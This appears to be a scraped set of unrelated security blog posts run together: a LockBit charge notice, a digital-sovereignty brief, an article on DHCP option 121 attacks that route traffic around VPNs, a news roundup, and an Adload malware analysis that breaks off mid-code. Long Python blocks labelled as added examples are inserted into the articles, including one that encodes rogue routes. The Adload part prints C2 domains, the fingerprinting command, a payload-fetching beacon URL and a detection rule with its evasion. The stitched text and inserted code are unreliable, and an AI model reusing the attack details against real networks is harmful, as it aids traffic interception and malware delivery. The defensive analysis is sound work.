In June 2023, Russian national Ruslan Magomedovich Astamirov was charged in New Jersey for his participation in the LockBit conspiracy, including the deployment of LockBit against victims in Florida, Japan, France, and Kenya. Astamirov is currently in custody in the United States awaiting trial.

The Justice Department is urging victims targeted by LockBit to contact the FBI at https://lockbitvictims.ic3.gov/ to file an official complaint, and to determine whether affected systems can be successfully decrypted.

PinnacleOne ExecBrief | Digital Sovereignty and Splinternets in Cloud, AI & Space

Last week, PinnacleOne reviewed the collision of commercial interests and state competition in space.

This week, we step back and examine the growing trend towards digital sovereignty, manifesting in national competition to secure and lead increasingly strategic cloud, AI, and space networks.


Contact us directly with any comments or questions: pinnacleone-info@sentinelone.com

Insight Focus | Digital Sovereignty and Splinternets in Cloud, AI, and Space

The concept of digital sovereignty has gained significant traction in recent years as nations seek to assert greater control over critical economic and military capabilities at the technical frontier. This trend – driven by geopolitical competition and the strategic importance of data, cloud computing, artificial intelligence (AI), and space technologies – has significant implications for global businesses. As nations pursue sovereign capabilities across these domains, corporate leaders must navigate an increasingly complex and fragmented digital and security landscape.

Data/Cloud Sovereignty

Nations are establishing sovereign cloud services to maintain control over their data and ensure compliance with local regulations and privacy requirements. The partnership between Microsoft and G42 in the United Arab Emirates exemplifies this trend, offering secure access to cloud and AI features while adhering to local data sovereignty requirements. Microsoft is also expanding its Azure services footprint in the UAE via Khazna Data Centers, a joint venture between G42 and e& to support this initiative.

In the words of Secretary Raimondo, “When it comes to emerging technology, you cannot be both in China’s camp and our camp.” It remains to be seen which side will end up benefiting more from this deal, given how much the U.S. had to offer to (apparently) woo G42 from its Chinese entanglements. Nevertheless, the forces of geopolitical network competition are clearly multipolar – this gives middle powers juice to make deals with multinational cloud providers on favorable terms, including respect for data sovereignty and localization of frontier capabilities.

AI Sovereignty

The strategic importance of AI is leading more nations to pursue AI sovereignty, recognizing the need to develop and (attempt to) control this transformative technology. Industry leaders like Jensen Huang of Nvidia and Arvind Krishna of IBM have advocated for countries to build their own “sovereign AI” capabilities, tailored to their specific language, cultural, and business needs.

Leading and guiding AI technologies is seen as critical for defending national interests and ensuring economic and military security. Examples of sovereign AI strategies include India’s plan to organize and make available Indian data for AI model creation, Singapore’s Southeast Asia AI plan, the Netherlands’ generative AI vision, and Taiwan’s sovereign model strategy to counter the influence of Chinese AI tools. As a sign of the times, some tech investors are eyeing the idea of “sovereign computational stacks” which float aboard undersea-cable connected platforms that help sanctioned entities skirt regulators.

Space Sovereignty

Nations are also seeking to establish their own satellite constellations for secure, reliable, and high-bandwidth communications, commercial space-based observation, scientific, and defense purposes. The United States’ Proliferated Warfighter Space Architecture (PWSA), a secure low-Earth orbit (LEO) network, and China’s plans for a LEO broadband constellation highlight the growing importance of space sovereignty in the LEO domain, currently dominated by SpaceX. The European Union has also approved plans for the IRIS² constellation, a multi-orbit satellite system designed to bolster Europe’s governmental and institutional communication services and digital sovereignty.

The UAE has formed its own national space champion, Space42, by merging its AI-driven geospatial intelligence provider Bayanat with Yahsat, the UAE’s principal satellite firm. The link between space and AI is explicit per the Space42 chairman, “Building upon its enormous capabilities, the new entity is poised to play a significant role in realizing the ambitious objectives outlined by the National Space Strategy 2030 and the National Strategy for Artificial Intelligence 2031”.

As we examined last week, these developments have significant implications for the blurred lines between commercial interests and national imperatives as the space domain becomes increasingly contested and potentially a field of conflict.

Compliance and Cybersecurity Challenges

As nations assert digital sovereignty, companies operating globally will face a complex web of data governance, privacy, and operational regulations across multiple jurisdictions. Compliance with diverse requirements for data localization, storage, processing, and access will be a significant challenge. Moreover, the fragmentation of digital infrastructure and the proliferation of sovereign systems may introduce new cybersecurity risks, as companies must ensure the security and integrity of their data and systems across multiple platforms and jurisdictions.

Market Access and Data Flow Implications

The rise of sovereign cloud services, AI capabilities, and space and terrestrial communication networks may restrict the free flow of data across borders and limit market access for foreign companies. Nations may prioritize domestic providers or impose barriers to entry for foreign firms, particularly in strategic sectors. For example, China’s LEO broadband constellation could hinder outside attempts to garner market share within the country or its allies. Executives must anticipate potential disruptions to their global operations and supply chains while exploring partnerships or localization strategies to maintain access to key markets.

Navigating the Fragmented Digital Landscape

The proliferation of sovereign digital infrastructures could lead to a fragmented global digital landscape, often referred to as the “splinternet”. This fragmentation may hinder interoperability, collaboration, and innovation across borders, impacting the ability of multinational companies to leverage digital technologies effectively. Leaders must consider the long-term implications of a splintered digital ecosystem and develop strategies to navigate this increasingly complex environment while ensuring the security and resilience of their digital assets.

Strategic Considerations for Corporate Leaders

  1. Assess compliance and cybersecurity requirements – Evaluate the impact of digital sovereignty regulations in each market and ensure compliance with data governance, privacy, and operational requirements while addressing the cybersecurity challenges posed by fragmented digital infrastructures.
  2. Mitigate market access risks – Anticipate potential disruptions to global operations and supply chains due to restricted data flows and market access barriers. Consider partnerships or localization strategies to maintain a presence in key markets.
  3. Adapt to a fragmented digital landscape – Develop strategies to navigate the complexities of a splintered digital ecosystem, addressing interoperability challenges, potential barriers to collaboration and innovation, and the cybersecurity implications of operating across multiple sovereign platforms.
  4. Invest in resilient and secure digital infrastructure – Build resilient and adaptable digital infrastructure that can withstand the challenges posed by digital sovereignty trends and ensure the security and integrity of data and systems across multiple jurisdictions.
  5. Engage in policy dialogues – Actively participate in policy discussions and industry forums to advocate for balanced approaches that safeguard national interests, promote global collaboration and innovation, and address the cybersecurity challenges posed by digital sovereignty.

Going Forward

The pursuit of digital sovereignty by nations has significant implications for the global digital landscape, potentially leading to a fragmented “splinternet” and introducing new cybersecurity and enterprise architecture challenges. Corporate leaders must navigate an increasingly complex web of compliance requirements, market access barriers, interoperability issues, and cybersecurity risks.

By proactively assessing the impact of digital sovereignty trends, adapting strategies accordingly, investing in secure and resilient digital infrastructure, and engaging in policy dialogues, executives can position their organizations to thrive in an increasingly complex and fragmented digital world.

Why Your VPN May Not Be As Secure As It Claims

Virtual private network (VPN) providers market their services as a way to prevent anyone from snooping on your Internet usage. But new research suggests this is a dangerous assumption when connecting to a VPN from an untrusted network, because an attacker on the same network can force a target’s traffic out of the VPN’s protection without triggering any alert to the user.


When a device first joins a network, it broadcasts a message to the whole local network asking to be assigned an IP address. Normally, the only system that notices this request and replies is the router responsible for managing the network the user is joining.

The machine on a network responsible for fielding these requests is called a Dynamic Host Configuration Protocol (DHCP) server, and it issues time-limited leases for IP addresses. The DHCP server also tells each client which local address to use as its default gateway, the next hop for all traffic bound for the Internet.

VPNs work by creating a virtual network interface that serves as an encrypted tunnel for communications. But researchers at Leviathan Security say they have discovered that an obscure feature of the DHCP standard can be abused by a rogue DHCP server on the local network to steer a VPN user’s traffic around that tunnel.

“Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway,” Leviathan researchers Lizzie Moratti and Dani Cronce wrote. “When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.”

The feature being abused here is known as DHCP option 121, and it allows a DHCP server to set a route on the VPN user’s system that is more specific than those used by most VPNs. Abusing this option, Leviathan found, effectively gives an attacker on the local network the ability to set up routing rules that have a higher priority than the routes for the virtual network interface that the target’s VPN creates.

“Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface,” the Leviathan researchers said. “This is intended functionality that isn’t clearly stated in the RFC [standard]. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.”
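To make the routing argument concrete, here is an added example (not code from the article or from Leviathan’s published tooling) that encodes and decodes option 121 in its RFC 3442 wire format and then applies longest-prefix matching to a routing table that contains a typical VPN’s two /1 routes. The interface names tun0 and en0, the attacker gateway 192.168.1.50 and the destination prefixes are constructed for illustration.

```python
"""
Added example, not code from the KrebsOnSecurity article or from Leviathan's
published tooling: encode and decode DHCP option 121 (RFC 3442 classless
static routes) and simulate longest-prefix-match route selection to show why
a route pushed by a rogue DHCP server wins over the /1 routes a typical VPN
client installs. Interface names (tun0, en0), the attacker gateway
192.168.1.50 and the prefixes are constructed for illustration.
"""
import ipaddress

# Routes a typical VPN client installs to capture all traffic without touching
# the existing default route: two /1s that together cover all of IPv4.
VPN_TUNNEL_ROUTES = [("0.0.0.0/1", "tun0"), ("128.0.0.0/1", "tun0")]
PHYSICAL_DEFAULT = ("0.0.0.0/0", "en0")   # the LAN's normal default route


def encode_option121(routes):
    """Build an option 121 payload from (destination CIDR, router) pairs.

    RFC 3442 wire format per route: one byte of prefix length, then only the
    significant octets of the destination (ceil(prefix/8) of them), then the
    four-octet router address.
    """
    out = bytearray()
    for dest, router in routes:
        net = ipaddress.ip_network(dest, strict=True)  # reject host bits set
        sig = (net.prefixlen + 7) // 8
        out.append(net.prefixlen)
        out += net.network_address.packed[:sig]
        out += ipaddress.IPv4Address(router).packed
    return bytes(out)


def decode_option121(payload):
    """Parse an option 121 payload into a list of (destination CIDR, router)."""
    routes, i = [], 0
    while i < len(payload):
        plen = payload[i]
        i += 1
        if plen > 32:
            raise ValueError("invalid prefix length %d" % plen)
        sig = (plen + 7) // 8
        if i + sig + 4 > len(payload):
            raise ValueError("truncated option 121 payload")
        dest = payload[i:i + sig] + b"\x00" * (4 - sig)  # zero-pad to 4 octets
        i += sig
        router = ipaddress.IPv4Address(payload[i:i + 4])
        i += 4
        net = ipaddress.ip_network("%s/%d" % (ipaddress.IPv4Address(dest), plen),
                                   strict=False)
        routes.append((str(net), str(router)))
    return routes


def host_table_after_lease(payload, phys_iface="en0"):
    """Routing table of a VPN user whose lease carried this option 121 payload:
    the client installs every pushed route on the physical interface, next to
    the VPN's /1 routes."""
    table = list(VPN_TUNNEL_ROUTES) + [PHYSICAL_DEFAULT]
    for dest, _router in decode_option121(payload):
        table.append((dest, phys_iface))
    return table


def egress_interface(table, dst):
    """Longest-prefix match, the rule every IP stack applies: the most specific
    matching route wins, regardless of which daemon installed it."""
    dst_ip = ipaddress.IPv4Address(dst)
    best = None
    for cidr, iface in table:
        net = ipaddress.ip_network(cidr)
        if dst_ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else None


def tunnel_bypass_routes(payload):
    """Audit check: pushed routes at least as specific as the VPN's /1 routes
    can steal traffic from the tunnel. A pushed /0 cannot (it loses to /1);
    equal-length ties are resolved in OS-specific ways, so /1s are flagged."""
    return [(d, r) for d, r in decode_option121(payload)
            if ipaddress.ip_network(d).prefixlen >= 1]


if __name__ == "__main__":
    rogue = encode_option121([("203.0.113.0/24", "192.168.1.50")])  # constructed
    table = host_table_after_lease(rogue)
    print("203.0.113.10 ->", egress_interface(table, "203.0.113.10"))  # en0: leaks
    print("198.51.100.5 ->", egress_interface(table, "198.51.100.5"))  # tun0
    print("bypass routes:", tunnel_bypass_routes(rogue))
```

Running the block shows 203.0.113.10 leaving via en0 while 198.51.100.5 still takes tun0. tunnel_bypass_routes() is the check to run against a lease before trusting a VPN on that network; a pushed 0.0.0.0/0 route is harmless here because /1 beats /0, which is exactly why the attack pushes more specific prefixes.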

Leviathan also found ways to make a target’s host take its lease from the rogue server rather than the legitimate one. In one well-documented tactic, known as a DHCP starvation attack, the attacker floods the legitimate DHCP server with requests that consume every IP address it can allocate; once the legitimate server has nothing left to hand out, the rogue DHCP server answers the pending requests.

“This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server,” the researchers wrote. “We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.”

The researchers say their methods could be used by an attacker who compromises a DHCP server or wireless access point, or by a rogue network administrator who owns the infrastructure themselves and maliciously configures it. Alternatively, an attacker could set up an “evil twin” wireless hotspot that mimics the signal broadcast by a legitimate provider.

ANALYSIS

Bill Woodcock is executive director at Packet Clearing House, a nonprofit based in San Francisco. Woodcock said Option 121 has been included in the DHCP standard since 2002, which means the attack described by Leviathan has technically been possible for the last 22 years.

“They’re realizing now that this can be used to circumvent a VPN in a way that’s really problematic, and they’re right,” Woodcock said.

Woodcock said anyone who might be a target of spear phishing attacks should be very concerned about using VPNs on an untrusted network.

“Anyone who is in a position of authority or maybe even someone who is just a high net worth individual, those are all very reasonable targets of this attack,” he said. “If I were trying to do an attack against someone at a relatively high security company and I knew where they typically get their coffee or sandwich at twice a week, this is a very effective tool in that toolbox. I’d be a little surprised if it wasn’t already being exploited in that way, because again this isn’t rocket science. It’s just thinking a little outside the box.”

Successfully executing this attack on a network likely would not allow an attacker to see all of a target’s traffic or browsing activity, because for the vast majority of websites the content is encrypted (the site’s address begins with https://). However, an attacker would still see the metadata, such as the source and destination addresses, of any traffic steered out of the tunnel, along with the full content of anything sent over a cleartext protocol such as unencrypted HTTP or DNS.

KrebsOnSecurity shared Leviathan’s research with John Kristoff, founder of dataplane.org and a PhD candidate in computer science at the University of Illinois Chicago. Kristoff said practically all user-edge network gear, including WiFi deployments, support some form of rogue DHCP server detection and mitigation, but that it’s unclear how widely deployed those protections are in real-world environments.

“However, and I think this is a key point to emphasize, an untrusted network is an untrusted network, which is why you’re usually employing the VPN in the first place,” Kristoff said. “If [the] local network is inherently hostile and has no qualms about operating a rogue DHCP server, then this is a sneaky technique that could be used to de-cloak some traffic – and if done carefully, I’m sure a user might never notice.”
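The routing table does record the rerouting, which is the one place a careful user can notice it. The following is an added example, not code from the article or from Leviathan, that parses Linux `ip route show` output and reports gateway routes on a non-tunnel interface that are at least as specific as the tunnel’s own routes. The sample output, the interface names, the VPN server address 198.51.100.7 and the LAN addressing are all constructed.

```python
"""
Added example, not code from the article or from Leviathan: audit a Linux
routing table (as printed by `ip route show`) for routes that would carry
traffic around a VPN tunnel. The sample output below is constructed; the
tunnel interface, VPN server address and LAN addressing are assumptions.
"""
import ipaddress

# Constructed `ip route show` output from a laptop on an OpenVPN-style tunnel
# (tun0, server 198.51.100.7, the usual 0.0.0.0/1 + 128.0.0.0/1 pair) whose
# DHCP lease also carried a rogue option 121 route for 203.0.113.0/24.
SAMPLE_IP_ROUTE = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
0.0.0.0/1 via 10.8.0.1 dev tun0
128.0.0.0/1 via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
198.51.100.7 via 192.168.1.1 dev wlan0
203.0.113.0/24 via 192.168.1.50 dev wlan0 proto dhcp metric 600
"""


def parse_ip_route(text):
    """Parse `ip route show` lines into dicts: dst (IPv4Network), dev, via, proto."""
    routes = []
    for line in text.splitlines():
        tok = line.split()
        if not tok:
            continue
        dst = "0.0.0.0/0" if tok[0] == "default" else tok[0]
        if "/" not in dst:
            dst += "/32"  # ip route prints host routes without a prefix length
        route = {"dst": ipaddress.ip_network(dst, strict=False),
                 "dev": None, "via": None, "proto": None}
        for key in ("dev", "via", "proto"):
            if key in tok:
                route[key] = tok[tok.index(key) + 1]
        routes.append(route)
    return routes


def leaky_routes(routes, tunnel_dev, vpn_server):
    """Routes that can carry traffic around the tunnel: gateway routes on any
    other interface that are at least as specific as the tunnel's least
    specific route. Legitimate exceptions: the default route (less specific
    than the tunnel's /1s), directly connected subnets (no `via`) and the /32
    host route to the VPN server, which must stay on the physical interface."""
    tunnel_plen = min((r["dst"].prefixlen for r in routes if r["dev"] == tunnel_dev),
                      default=None)
    if tunnel_plen is None:
        return []  # tunnel not up: nothing to bypass
    server = ipaddress.ip_address(vpn_server)
    leaks = []
    for r in routes:
        if r["dev"] == tunnel_dev or r["via"] is None:
            continue
        if r["dst"].prefixlen == 32 and r["dst"].network_address == server:
            continue
        if r["dst"].prefixlen >= tunnel_plen:
            leaks.append(r)
    return leaks


def report(text, tunnel_dev, vpn_server):
    """One line per bypass route, suitable for an alert or a post-connect hook."""
    return ["%s via %s dev %s bypasses %s" % (r["dst"], r["via"], r["dev"], tunnel_dev)
            for r in leaky_routes(parse_ip_route(text), tunnel_dev, vpn_server)]


if __name__ == "__main__":
    for line in report(SAMPLE_IP_ROUTE, "tun0", "198.51.100.7"):
        print(line)
```

Caveats: wg-quick on Linux installs WireGuard’s catch-all routes in a separate table selected by fwmark rules, so there the check has to read `ip rule` and `ip route show table all`; macOS `netstat -rn` prints a different format and needs its own parser; and a check like this belongs in a post-connect hook that re-runs periodically, because the lease renewal that reinstalls the rogue route can happen at any time after the VPN reports connected.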

MITIGATIONS

According to Leviathan, there are several ways to minimize the threat from rogue DHCP servers on an unsecured network. One is using a device powered by the Android operating system, which apparently ignores DHCP option 121.

Relying on a temporary wireless hotspot controlled by a cellular device you own also effectively blocks this attack.

“They create a password-locked LAN with automatic network address translation,” the researchers wrote of cellular hot-spots. “Because this network is completely controlled by the cellular device and requires a password, an attacker should not have local network access.”

Leviathan’s Moratti said another mitigation is to run your VPN from inside a virtual machine (VM) such as Parallels, VMware or VirtualBox. VPNs run inside a VM are not vulnerable to this attack, Moratti said, provided the VM is not run in “bridged mode”, which places the VM directly on the physical network as another node, where it would receive the rogue DHCP server’s lease like any other host.

In addition, what the researchers describe as “deep packet inspection” can be used to deny all inbound and outbound traffic on the physical interface except DHCP and traffic to the VPN server. However, Leviathan says this approach opens up a potential “side channel” attack that could be used to determine the destination of traffic.

“This could be theoretically done by performing traffic analysis on the volume a target user sends when the attacker’s routes are installed compared to the baseline,” they wrote. “In addition, this selective denial-of-service is unique as it could be used to censor specific resources that an attacker doesn’t want a target user to connect to even while they are using the VPN.”

Moratti said Leviathan’s research shows that many VPN providers are currently making promises to their customers that their technology can’t keep.

“VPNs weren’t designed to keep you more secure on your local network, but to keep your traffic more secure on the Internet,” Moratti said. “When you start making assurances that your product protects people from seeing your traffic, there’s an assurance or promise that can’t be met.”

A copy of Leviathan’s research, along with code intended to allow others to duplicate their findings in a lab environment, is available here.

The Good, the Bad and the Ugly in Cybersecurity – Week 18

The Good | Law Enforcement Set New IoT Device Protections, Charge Ex-NSA Spy, and Sentence REvil Affiliate to Prison

Global law enforcement agencies made significant strides this week, improving the minimum safety standards to protect tech consumers and officially sentencing two major cybersecurity criminals.

Tech manufacturers in the U.K. are now legally required to protect internet-connected devices against the risk of default passwords. The latest legislation prohibits weak passwords on smartphones, TVs, appliances, and more to ensure ongoing protection against credentials-based cyberattacks. Manufacturers must also provide a point of contact for reporting security issues and state when devices will receive important security updates. Those that fail to meet the provisions will now face recalls and penalty fees up to £10 million, or 4% of their global annual revenue – whichever is higher. The U.K. is the first country in the world to ban default credentials from IoT devices.

An ex-NSA employee caught trying to sell classified secrets to Russia has been formally sentenced to over 20 years in prison. The DoJ charged Jareh Sebastian Dalke, 32, for attempted espionage while he was employed as an information systems security designer for under two months. During his short tenure with the agency, Dalke met with what he thought was a Russian agent to exchange top-secret National Defense Information (NDI) documents for a sum of $85,000 and establish future opportunities to sell more documents.

Yaroslav Vasinskyi has been sentenced for deploying REvil ransomware in over 2,500 attacks, including the one on Kaseya in 2021. Demanding a combined $700 million from various U.S. victims, Vasinskyi and his co-conspirators often threatened to publish sensitive data to pressure victims into paying. The Ukrainian national pleaded guilty to conspiracy to commit fraud and related activity in connection with computers, damage to protected computers, and conspiracy to commit money laundering.

The Bad | Attackers Plant Millions of Malicious Repositories in Docker Hub Loaded with Malware

Millions of malicious “imageless” containers planted within Docker Hub have been redirecting unsuspecting users to phishing and malware sites for years. This week, security researchers reported on three large-scale malware campaigns specifically targeting the container image registry popular with developers and open source contributors globally.

According to the report, the containers were published over a five-year period and the campaigns have been running since early 2021. They account for approximately 20% of the malicious content found across 15 million repositories hosted on Docker Hub. The imageless containers identified by researchers have no content, only documentation ranging from spam to malware and phishing websites.

Each of the three campaigns employs different tactics to mislead users and distribute the malicious repositories. Using lures such as pirated content, video game cheats, educational e-books, and online diary-hosting services, the payloads ultimately contact a command and control (C2) server to transmit system metadata and obtain links to cracked software. Currently, researchers suspect the attacks are part of a larger operation that may involve monetization schemes via adware or third-party software distribution.

Source: JFrog

Security researchers note that these campaigns work by capitalizing on Docker Hub’s good name and credibility, which makes it all the more difficult to separate the legitimate containers from those triggering phishing and malware installation attempts. Continued misuse of Docker Hub by threat actors emphasizes the need for stricter moderation and better content screening mechanisms on such platforms.

As abuse of open-source ecosystems for malware distribution climbs, security experts warn users to exercise caution when downloading packages and to check for the designated trusted-content tags (on Docker Hub, the Docker Official Image and Verified Publisher badges) rather than trusting a repository on its name and documentation alone.

The Ugly | CISA Warns Against Critical GitLab Account Takeover Flaw Under Active Exploit

Ongoing attacks are plaguing GitLab instances this week caused by a critical severity vulnerability tracked as CVE-2023-7028 (CVSS 10.0). Confirming the active exploits, CISA has issued a warning about the flaw, adding it to their KEV catalog and urging all federal civilian executive branch (FCEB) agencies to remediate the risks within three weeks.

CVE-2023-7028 was first disclosed by GitLab in January and allows attackers to seize control of accounts. The flaw stems from improper access control in the password reset flow: a remote, unauthenticated attacker can have an account’s password reset email sent to an attacker-controlled, unverified email address, all without user interaction. Attackers could also exploit this vulnerability to infiltrate Continuous Integration and Continuous Delivery (CI/CD) pipelines, potentially leading to supply chain attacks.

GitLab released fixes in January in versions 16.5.6, 16.6.4 and 16.7.2 and backported them to 16.1.6, 16.2.9, 16.3.7 and 16.4.5. While there have been no reports of ransomware attacks linked to the account takeover flaw, CISA’s warning underscores the severity of the risk it poses.

Given the nature of the platform, GitLab houses large amounts of source code and API keys, all of which could be abused by attackers to breach organizations and carry out software supply chain attacks. According to Shadowserver, over 2,100 servers are still exposed to the vulnerability. Organizations using GitLab are urged to prioritize patching, follow GitLab’s incident response guidance, and check immediately for signs of compromise, starting with password reset requests whose email parameter carries more than one address. Accounts with two-factor authentication enabled cannot be taken over through this flaw even if a reset is triggered, which is one more reason to enforce it.

Source: Shadowserver

macOS Adload | Prolific Adware Pivots Just Days After Apple’s XProtect Clampdown 

It’s been little more than a week since Apple rolled out an unprecedented 74 new rules to its XProtect malware signature list in version 2192. A further 10 rules were appended in version 2193 on April 30th. Cupertino’s security team were clearly hoping that a concerted effort would serve to disrupt prolific adware distributor Adload’s assault on macOS devices. Those behind the adware, however, appear to have pivoted quickly as dozens of new Adload samples are already appearing that evade Apple’s new signatures.

In this post, we take a look at one variant of these new samples that is almost entirely undetected on VirusTotal at this time. We hope this exposure will both help inform security teams looking to keep adware nuisances out of their environment and serve to boost detection recognition across other vendor engines.

Apple’s Massive Adload Signature Update

With XProtect version 2192, Apple added 74 new rules to XProtect.yara. While a few of these were targeted at other malware and adware distributors, the vast majority targeted adware widely known as Adload.

To put this update in context, prior to version 2192, XProtect had a total of 207 rules, with around two dozen targeting historical versions of Adload. With 2192, the rule count – taking into account both additions and removals – went up to 279, and then 289 with XProtect v2193.

While a few hundred malware rules pales in comparison to the efforts of external security vendors, who tend to have thousands if not tens of thousands of rules as well as behavioral and machine learning engines, an increase of roughly 35% in one update (207 rules to 279) represents a considerable amount of effort. Each rule has to be researched and thoroughly tested to ensure it will not cause false positives, catching innocent programs in its attempt to block malicious ones.

That undertaking would have been ongoing for quite some time and Apple would have hoped that the final result would cause the adware distributor to experience major disruption. No one would expect such actors to just give up and go home – not when there’s significant amounts of money to be made – but it must have been hoped that it would take some time for the malware authors to reconstruct their codebase.

Not so, as it turns out. We began observing new versions of Adload that evade XProtect’s new signatures during last week. Many of these were still widely detected by vendor engines, but by the weekend we were seeing Adload samples that were bypassing both XProtect and other vendors’ engines on VirusTotal.

Image: New Adload samples (VirusTotal)

The XProtect update on the last day of April, v2193, did not address these changes to Adload, instead targeting other prolific adware distributors Pirrit and Bundlore.

New Adload Go Variant (Rload/Lador)

Of the new Adload variants that we have seen, one consistently showed up as having 0 or only 1 detection among VirusTotal engines. This variant has a file size of 4.55MB and is compiled solely for Intel x86_64 architecture. The binaries function as initial droppers for the next stage payload.

None of the early samples we saw this week showed relationships to a parent executable, application or disk image, and none were codesigned, leaving the specific distribution method obscure, though typically these droppers are embedded in cracked or trojanized apps distributed via malicious websites, torrents and other means. However, all the new samples embedded a unique custom domain registered with Namecheap and following known Adload patterns.

SHA1                                       Domain
13312b3dad9633fa185351e28397c21415d95125   api[.]deployquest[.]com
21c447cac1c13a6804e52f216a4c41a20c963c01   api[.]searchwebmesh[.]com
5b1d60c6f461cd8ba91cbca5c7190f4b2752979d   api[.]generalmodules[.]com
67a56aa269b9301981c0538ace75bec2cd381656   api[.]validexplorer[.]com
7aaff54d2d6e3f38e51a4f084e17b9aad79a9de0   api[.]operativeeng[.]com
912a2ab06d3afe89e8e2ad19d3300055f0e0a968   api[.]buffermanager[.]com
a99d03fc3b32742de6688274a3ee3cdaef0172bf   api[.]lookwebresults[.]com
f166eb63162ce4a5ac169e01c160be98b0e27e13   api[.]navigationbuffer[.]com
feb2c674f135410c3ced05c301f19ab461e37b20   api[.]inetprogress[.]com

On execution, the droppers perform system information discovery (T1082) via the ioreg utility, which returns the platform expert device properties, including IOPlatformUUID and the hardware serial number:

ioreg -rd1 -c IOPlatformExpertDevice

The malware then resolves a hardcoded domain, stored in the Go variable sym._main.dwnldUrl, and sends an HTTP GET request to it, expecting a gzip-compressed payload in response. The UUID-shaped b= parameter in the request below is the machine identifier obtained via ioreg.

Hardcoded Adload domain and beacon request (from one sample):

headers = Host: api[.]operativeeng[.]com, User-agent: Go-http-client/1.1, Accept-encoding: gzip
url = http[:]//api[.]operativeeng[.]com/ga?a=1104&b=E5282DF2-04D7-C854-BD9C-9B4A98F26EDC

The dropper writes the response to a subdirectory in /tmp/. The subdirectory name takes the form of /tmp/[0-9]{10}. If the remote server does not return a compressed archive, the subdirectory will contain an HTML 404 response.

Minor Tweak Evades XProtect Signature Rule

Looking at the binaries from a static point of view, there are a number of interesting artifacts. These binaries use an external (and legitimate) Go package, github.com/denisbrodbeck/machineid, to determine the machine’s unique ID; on macOS that package reads IOPlatformUUID through the ioreg command shown above, which is what the UUID-shaped b= parameter of the beacon carries.

The function that utilizes this package also calls another function to shell out commands, namely sym._os_exec.Command. Although Apple has targeted both of these artifacts in its signatures, the malware still evades detection by XProtect. The rule in XProtect.yara responsible for protecting Mac devices against these adware droppers is as follows:

rule macos_smolgolf_adload_dropper
{
meta:
    description = "MACOS.ADLOAD"
strings:
    $varName = "main.DownloadURL"
    $libraryName = "github.com/denisbrodbeck/machineid.ID"
    $execCommand = "os/exec.Command"
condition:
    Macho and all of them
}

However, the rule’s condition requires all three strings, so the latest samples evade it simply because the authors renamed the variable main.DownloadURL to main.dwnldUrl while leaving the other two artifacts in place.
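The rename is cheap for the attacker and costly for a literal-string rule. As an added example (not code from this post, from Apple’s XProtect, or from SentinelOne’s engines), the following scanner reproduces the quoted rule’s logic in Python alongside a rename-tolerant variant, and extracts api.<label>.com hostnames for comparison with the IOC list below. The two byte buffers stand in for Mach-O binaries and are constructed, not the real samples.

```python
"""
Added example, not code from the SentinelOne post, from Apple's XProtect or
from SentinelOne's engines: contrast the literal-string logic of the quoted
macos_smolgolf_adload_dropper rule with a rename-tolerant variant, and pull
api.<label>.com hostnames out of a binary for comparison with the page's IOC
list. The byte buffers are constructed stand-ins, not the real samples.
"""
import re

# Mach-O magic numbers (32/64-bit, both byte orders, and fat/universal).
MACHO_MAGICS = (b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe")

# The three literal strings from the quoted XProtect rule.
LITERALS = (b"main.DownloadURL",
            b"github.com/denisbrodbeck/machineid.ID",
            b"os/exec.Command")

# Rename-tolerant stand-in for the first literal: a main-package Go symbol
# whose name ends in "url" in any capitalisation (DownloadURL, dwnldUrl, ...).
URL_SYMBOL = re.compile(rb"main\.[A-Za-z0-9_]*[Uu][Rr][Ll]\b")

# Every C2 domain in the page's IOC list follows the api.<label>.com pattern.
API_HOST = re.compile(rb"api\.[a-z0-9-]{3,40}\.com\b")
PAGE_IOC_DOMAINS = {  # copied from the IOC list on the page
    "api.buffermanager.com", "api.deployquest.com", "api.generalmodules.com",
    "api.inetprogress.com", "api.lookwebresults.com", "api.navigationbuffer.com",
    "api.operativeeng.com", "api.searchwebmesh.com", "api.validexplorer.com",
}

# Constructed stand-ins for the droppers (not the real samples): a 64-bit
# Mach-O magic followed by the strings a Go binary would carry.
OLD_DROPPER = (b"\xcf\xfa\xed\xfe" + b"\x00" * 28
               + b"main.DownloadURL\x00"
               + b"github.com/denisbrodbeck/machineid.ID\x00"
               + b"os/exec.Command\x00"
               + b"api.operativeeng.com\x00")
NEW_DROPPER = OLD_DROPPER.replace(b"main.DownloadURL", b"main.dwnldUrl")
NOT_MACHO = b"\x7fELF" + OLD_DROPPER[4:]


def is_macho(buf):
    return buf[:4] in MACHO_MAGICS


def xprotect_literal_match(buf):
    """Same condition as the quoted rule: Macho and all three literals."""
    return is_macho(buf) and all(s in buf for s in LITERALS)


def tolerant_match(buf):
    """Keep the two behaviour-bearing imports literal (dropping them means
    rewriting the dropper) and match the renamed variable by pattern. This is
    broader than the literal rule and can hit benign Go tools that fingerprint
    the machine and shell out, so treat it as a triage signal, not a block rule."""
    return (is_macho(buf)
            and all(s in buf for s in LITERALS[1:])
            and URL_SYMBOL.search(buf) is not None)


def extract_api_hosts(buf):
    return sorted({m.decode("ascii") for m in API_HOST.findall(buf)})


def known_iocs(buf):
    return [h for h in extract_api_hosts(buf) if h in PAGE_IOC_DOMAINS]


def classify(buf):
    return {
        "literal_rule": xprotect_literal_match(buf),
        "tolerant_rule": tolerant_match(buf),
        "hosts": extract_api_hosts(buf),
        "known_iocs": known_iocs(buf),
    }


if __name__ == "__main__":
    for name, sample in (("old", OLD_DROPPER), ("new", NEW_DROPPER)):
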